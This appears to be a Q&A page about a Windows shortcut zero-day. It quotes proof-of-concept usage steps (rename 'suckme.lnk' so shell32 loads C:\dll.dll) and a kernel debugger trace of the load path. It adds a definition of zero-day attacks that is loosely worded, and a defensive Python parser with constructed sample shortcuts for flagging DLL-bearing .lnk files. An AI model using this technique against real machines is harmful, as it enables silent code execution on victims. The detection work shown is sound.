Zero-day exploit code

2025-02-19 13:16:15, 84 views

Best answer

Article title: Zero-day exploit code

Article content:

Information taken from [1]:

1. Unzip the files into the 'C:' directory. Start DbgView, or attach KD inside the virtual machine.

2. Rename 'suckme.lnk_' to 'suckme.lnk' and let shell32.dll's magic do the rest.

3. Check the logs.

Tested on XP SP3.

kd> g
Breakpoint 1 hit
eax=00000001 ebx=00f5ee7c ecx=0000c666 edx=00200003 esi=00000001 edi=7c80a6e4
eip=7ca78712 esp=00f5e9c4 ebp=00f5ec18 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
SHELL32!_LoadCPLModule+0x10d:
001b:7ca78712 ff15a0159d7c    call    dword ptr [SHELL32!_imp__LoadLibraryW (7c9d15a0)]

kd> dd esp
00f5e9c4  00f5ee7c 000a27bc 00f5ee78 00000000
00f5e9d4  00000020 00000008 00f5ee7c 00000000
00f5e9e4  00000000 0000007b 00000000 00000000
00f5e9f4  00200073 002000e0 0000064c 0000028c
00f5ea04  1530000a 00000000 003a0043 0064005c
00f5ea14  006c006c 0064002e 006c006c 006d002e
00f5ea24  006e0061 00660069 00730065 00000074
00f5ea34  00090608 7c92005d 00000000 00000007

kd> db 00f5ee7c
00f5ee7c  C.:.\.d.l.l...d.
00f5ee8c  l.l....|......r.
00f5ee9c  K..........|....
00f5eeac  ...|0...4.......
00f5eebc  ...|0.......P@..
00f5eecc  ...|@...
00f5eedc  ...|0.......P@...
00f5eeec  ...........|

kd> kv
ChildEBP RetAddr  Args to Child
00f5ec18 7ca81a74 00f5ee7c 000a27bc 00f5f2c4 SHELL32!_LoadCPLModule+0x10d (FPO: [1,145,4])
00f5ee50 7ca82543 00f5ee74 000a27bc 000a27c0 SHELL32!CPL_LoadAndFindApplet+0x4a (FPO: [4,136,4])
00f5f294 7cb56065 000a25b4 000a27bc 000a27c0 SHELL32!CPL_FindCPLInfo+0x46 (FPO: [4,264,4])
00f5f2b8 7ca13714 00000082 00000000 00000104 SHELL32!CCtrlExtIconBase::_GetIconLocationW+0x7b (FPO: [5,0,0])
00f5f2d4 7ca1d306 000a25ac 00000082 00f5f570 SHELL32!CExtractIconBase::GetIconLocation+0x1f (FPO: [6,0,0])
00f5f410 7ca133b6 000dd7e0 00000082 00f5f570 SHELL32!CShellLink::GetIconLocation+0x69 (FPO: [6,68,4])
00f5f77c 7ca03c88 000dd7e0 00000000 0015aa00 SHELL32!_GetILIndexGivenPXIcon+0x9c (FPO: [5,208,4])
00f5f7a4 7ca06693 00131c60 000dd7e0 0015aa00 SHELL32!SHGetIconFromPIDL+0x90 (FPO: [5,0,4])
00f5fe20 7ca12db0 00131c64 0015aa00 00000000 SHELL32!CFSFolder::GetIconOf+0x24e (FPO: [4,405,4])
00f5fe40 7ca15e3c 00131c60 00131c64 0015aa00 SHELL32!SHGetIconFromPIDL+0x20 (FPO: [5,0,0])
00f5fe68 7ca03275 000f8090 0014d5b0 0014a910 SHELL32!CGetIconTask::RunInitRT+0x47 (FPO: [1,2,4])
00f5fe84 75f11b9a 000f8090 75f11b18 75f10000 SHELL32!CRunnableTask::Run+0x54 (FPO: [1,1,4])
00f5fee0 77f49598 00155658 000cb748 77f4957b BROWSEUI!CShellTaskScheduler_ThreadProc+0x111 (FPO: [1,17,0])
00f5fef8 7c937ac2 000cb748 7c98e440 0014cfe0 SHLWAPI!ExecuteWorkItem+0x1d (FPO: [1,0,4])
00f5ff40 7c937b03 77f4957b 000cb748 00000000 ntdll!RtlpWorkerCallout+0x70 (FPO: [Non-Fpo])
00f5ff60 7c937bc5 00000000 000cb748 0014cfe0 ntdll!RtlpExecuteWorkerRequest+0x1a (FPO: [3,0,0])
00f5ff74 7c937b9c 7c937ae9 00000000 000cb748 ntdll!RtlpApcCallout+0x11 (FPO: [4,0,0])
00f5ffb4 7c80b729 00000000 00edfce4 00edfce8 ntdll!RtlpWorkerThread+0x87 (FPO: [1,7,0])
00f5ffec 00000000 7c920250 00000000 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])

Further information

A "zero-day" vulnerability, also called a zero-hour attack, is a security flaw that is maliciously exploited as soon as it is discovered. Put plainly, the malicious program appears on the same day the flaw and its security patch become public. Such attacks tend to be sudden and highly destructive.
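The trace in the answer ends with SHELL32!_LoadCPLModule calling LoadLibraryW on a path ("C:\dll.dll", visible at 00f5ee7c) that is reached purely through icon extraction for a shortcut (CShellLink::GetIconLocation via CPL_FindCPLInfo and CPL_LoadAndFindApplet), so Explorer loads a DLL named inside the .lnk without the user ever opening it. The natural triage question is how to find such shortcuts before a shell renders them. What follows is an added example, not code from the page or from the [1] source: a Python parser for the public ShellLink layout (0x4C-byte header, optional LinkTargetIDList of length-prefixed ItemIDs ending in a 0x0000 terminator) that reports any UTF-16 ".dll" path embedded in the ID list. The ".dll" heuristic, the two sample shortcuts, and every function name in the script are this example's own assumptions.

```python
"""Static triage of .lnk files: flag shortcuts whose LinkTargetIDList embeds a
DLL path.  Added example, not code from the page.  The layout follows the public
ShellLink format; treating a ".dll" string inside the IDList as suspicious is a
heuristic chosen here (assumption), not something the page states."""
import struct

LNK_HEADER_SIZE = 0x4C
# LinkCLSID {00021401-0000-0000-C000-000000000046} in its on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x00000001  # LinkFlags bit 0


def parse_id_list(data):
    """Split an ItemIDList body into the payload bytes of each ItemID."""
    items, off = [], 0
    while off + 2 <= len(data):
        cb = struct.unpack_from("<H", data, off)[0]
        if cb == 0:                       # TerminalID ends the list
            return items
        if cb < 2 or off + cb > len(data):
            raise ValueError("malformed ItemID at offset %d" % off)
        items.append(data[off + 2:off + cb])
        off += cb
    raise ValueError("ItemIDList has no terminator")


def parse_lnk(blob):
    """Return (LinkFlags, [ItemID payloads]) for a ShellLink blob."""
    if len(blob) < LNK_HEADER_SIZE:
        raise ValueError("too short to be a ShellLink")
    header_size = struct.unpack_from("<I", blob, 0)[0]
    if header_size != LNK_HEADER_SIZE or blob[4:20] != LNK_CLSID:
        raise ValueError("ShellLink header/CLSID mismatch")
    flags = struct.unpack_from("<I", blob, 0x14)[0]
    items = []
    if flags & HAS_LINK_TARGET_ID_LIST:
        size = struct.unpack_from("<H", blob, LNK_HEADER_SIZE)[0]
        start = LNK_HEADER_SIZE + 2
        if start + size > len(blob):
            raise ValueError("IDListSize exceeds file")
        items = parse_id_list(blob[start:start + size])
    return flags, items


def utf16le_strings(data, min_chars=4):
    """Extract runs of printable ASCII stored as UTF-16LE (byte, 0x00 pairs)."""
    found, i, n = [], 0, len(data)
    while i + 1 < n:
        j, chars = i, []
        while j + 1 < n and 0x20 <= data[j] < 0x7F and data[j + 1] == 0:
            chars.append(chr(data[j]))
            j += 2
        if len(chars) >= min_chars:
            found.append("".join(chars))
            i = j
        else:
            i += 1
    return found


def find_dll_targets(blob):
    """Heuristic (assumption): report every UTF-16 string ending in .dll found
    inside the IDList; an ordinary file shortcut should not carry one."""
    _, items = parse_lnk(blob)
    return [s for item in items for s in utf16le_strings(item)
            if s.lower().endswith(".dll")]


def build_lnk(id_items, flags=HAS_LINK_TARGET_ID_LIST):
    """Build a minimal ShellLink blob (constructed test input, not a real file)."""
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))   # times, size, icon, reserved
    body = b"".join(struct.pack("<H", len(it) + 2) + it for it in id_items)
    body += b"\x00\x00"                                     # TerminalID
    return header + struct.pack("<H", len(body)) + body


# Constructed samples: the first embeds the same path the kd trace shows being
# handed to LoadLibraryW; the second points at an ordinary document.
SAMPLE_DLL_LNK = build_lnk([
    b"\x1f\x80" + bytes(16),                                        # opaque placeholder item
    b"\x00\x00" + "C:\\dll.dll".encode("utf-16le") + b"\x00\x00",  # item carrying the DLL path
])
SAMPLE_PLAIN_LNK = build_lnk([b"\x31\x01" + "notes.txt".encode("utf-16le") + b"\x00\x00"])

if __name__ == "__main__":
    for name, blob in (("dll.lnk", SAMPLE_DLL_LNK), ("plain.lnk", SAMPLE_PLAIN_LNK)):
        hits = find_dll_targets(blob)
        print("%-10s %s" % (name, ("SUSPICIOUS " + ", ".join(hits)) if hits else "ok"))
```

Run the script stand-alone to see both constructed samples classified; on real files, read the bytes and pass them to find_dll_targets. This is a static check only: it says nothing about whether the shell on a given build would actually load the DLL, and legitimate shortcuts to DLL-hosted Control Panel applets will also be reported, so treat a hit as a lead for the kind of dynamic confirmation the kd trace above documents rather than as a verdict.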
